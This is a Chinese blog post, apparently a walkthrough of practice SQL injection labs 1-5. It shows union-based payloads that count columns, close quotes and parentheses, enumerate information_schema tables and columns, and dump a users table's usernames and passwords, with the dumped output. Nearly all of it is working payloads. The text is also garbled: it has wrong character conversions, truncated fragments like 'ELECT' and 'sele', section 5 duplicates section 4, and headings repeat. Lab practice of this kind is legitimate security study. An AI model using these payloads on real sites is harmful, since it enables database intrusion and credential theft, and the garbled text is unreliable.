SQL注入1-5題

ELECT VERSION() -- mysql版本
SELECT USER() -- mysql資料庫的使用者名
SELECT DATABASE() -- 目前資料庫

SELECT *,schema_name FROM schemata -- 目前使用者擁有的所有的資料庫的名字,schema_name
SELECT * FROM TABLES -- 目前使用者擁有的所有資料庫及其庫下面的表的名字，table_schema,tablename
SELECT * FROM COLUMNS -- 目前使用者擁有的所有資料庫及其庫下面的表的名字，及表下面的字段的名字

(1).擷取所有賬号密碼有引号

擷取通路資料源列數

?id=1 order by 3 --+    //看是否通路出值，存在表示列數存在
sele user,pass from table where id='1' order by 3 --+ imint 0.1   //--+  将後面的imint進行一個注釋

擷取賬号和密碼所在列

?id=' union select 1,2,3  --+     // '  強行閉合放空

擷取所在的庫庫名（爆庫）

擷取所在的庫下的表名，并試着尋找最有可能的表（爆表）

?id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
    //Your Login name:emails,referers,uagents,users   找出來的表

擷取表下面的列，檢視是否正确

?id=' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的結果，确定了表

擷取所有密碼和賬号

?id=' union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的賬号和密碼

(2).擷取所有賬号密碼無引号

擷取通路資料源列數

?id=1 order by 3 --+    //看是否通路出值，存在表示列數存在
sele user,pass from table where id='1' order by 3 --+ imint 0.1   
//--+  将後面的imint進行一個注釋    因為id為數字型，沒有單引号括着

擷取賬号和密碼所在列

?id='' union select 1,2,3  --+
//數字型放空直接兩個單引号

擷取所在的庫庫名（爆庫）

擷取所在的庫下的表名，并試着尋找最有可能的表（爆表）

?id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
//Your Login name:emails,referers,uagents,users   找出來的表

擷取表下面的列，檢視是否正确

?id='' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的結果，确定了表

擷取所有密碼和賬号

?id='' union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的賬号和密碼

(3).擷取所有賬号密碼存在括号和單引号

擷取通路資料源列數

?id=1 order by 3 --+    //看是否通路出值，存在表示列數存在  
//--+  将後面的imint進行一個注釋    因為id為數字型，是以這裡不需要存在閉合

擷取賬号和密碼所在列

?id=') union select 1,2,3  --+
//數字型放空直接兩個單引号
?id='') union select 1,2,3  --+ //可以運作但是無結果，因為括号單引号和外閉合

擷取所在的庫庫名（爆庫）

擷取所在的庫下的表名，并試着尋找最有可能的表（爆表）

?id=') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
//Your Login name:emails,referers,uagents,users   找出來的表

擷取表下面的列，檢視是否正确

?id=') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的結果，确定了表

擷取所有密碼和賬号

?id=') union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的賬号和密碼

(4)擷取所有賬号密碼雙引号與括号

擷取通路資料源列數

?id=1") order by 3 --+    //看是否通路出值，存在表示列數存在  
//--+  将後面的imint進行一個注釋    因為存在雙引号和括号，需要對應才可以得到内容

擷取賬号和密碼所在列

?id=") union select 1,2,3  --+
//數字型放空直接兩個單引号

擷取所在的庫庫名（爆庫）

擷取所在的庫下的表名，并試着尋找最有可能的表（爆表）

?id=") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
//Your Login name:emails,referers,uagents,users   找出來的表

擷取表下面的列，檢視是否正确

?id=") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的結果，确定了表

擷取所有密碼和賬号

?id=") union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的賬号和密碼

(5)擷取所有賬号密碼

擷取通路資料源列數

?id=1") order by 3 --+    //看是否通路出值，存在表示列數存在  
//--+  将後面的imint進行一個注釋    因為存在雙引号和括号，需要對應才可以得到内容

擷取賬号和密碼所在列

?id=") union select 1,2,3  --+
//數字型放空直接兩個單引号

擷取所在的庫庫名（爆庫）

擷取所在的庫下的表名，并試着尋找最有可能的表（爆表）

?id=") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
//Your Login name:emails,referers,uagents,users   找出來的表

擷取表下面的列，檢視是否正确

?id=") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的結果，确定了表

擷取所有密碼和賬号

?id=") union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的賬号和密碼

2020.12.17 SQL注入SQL注入1-5題

SQL注入1-5題

(1).擷取所有賬号密碼有引号

(2).擷取所有賬号密碼無引号

(3).擷取所有賬号密碼存在括号和單引号

(4)擷取所有賬号密碼雙引号與括号

(5)擷取所有賬号密碼

繼續閱讀

資料庫之DQL操作資料庫

DOG（4）：解析器的部分實作細節先來說說parser一些可能迷惑的地方結果如何傳回?pcd其實是一回事最後的一點說明

Kali的安裝、配置和換國内源KALI的安裝、配置

mysql優化（sql優化）

資料遷移方法資料遷移原則資料遷移之雙寫方案資料遷移之級聯同步方案

redis叢集資料一緻性_RedisRaft為Redis叢集帶來強大的資料一緻性

寶塔面闆mysql恢複2018.1.8更新

Centos7 MySQL 5.7 安裝MySQL 5.7 安裝

查找入職員工時間排名倒數第三的員工所有資訊

Hibernate使用Hibernate的“3個準備，7個步驟”Hibernate API簡介操作實體對象對象識别

雲計算面試題——mysql/存儲引擎/備份

SQL語言基礎：常用的資料查詢語句

Ubuntu16.04安裝Apache+MySQL+PHP1. 安裝Apache2. 安裝MySQL3. 安裝PHP4. 安裝phpMyAdmin

MySQL的4種隔離級别？出現問題

neo4j之cypher使用文檔

mysql使用source指令導入.sql檔案

2020.12.17 SQL注入SQL注入1-5題

SQL注入1-5題

(1).擷取所有賬号密碼 有引号

(2).擷取所有賬号密碼 無引号

(3).擷取所有賬号密碼 存在括号和單引号

(4)擷取所有賬号密碼 雙引号與括号

(5)擷取所有賬号密碼

繼續閱讀

(1).擷取所有賬号密碼有引号

(2).擷取所有賬号密碼無引号

(3).擷取所有賬号密碼存在括号和單引号

(4)擷取所有賬号密碼雙引号與括号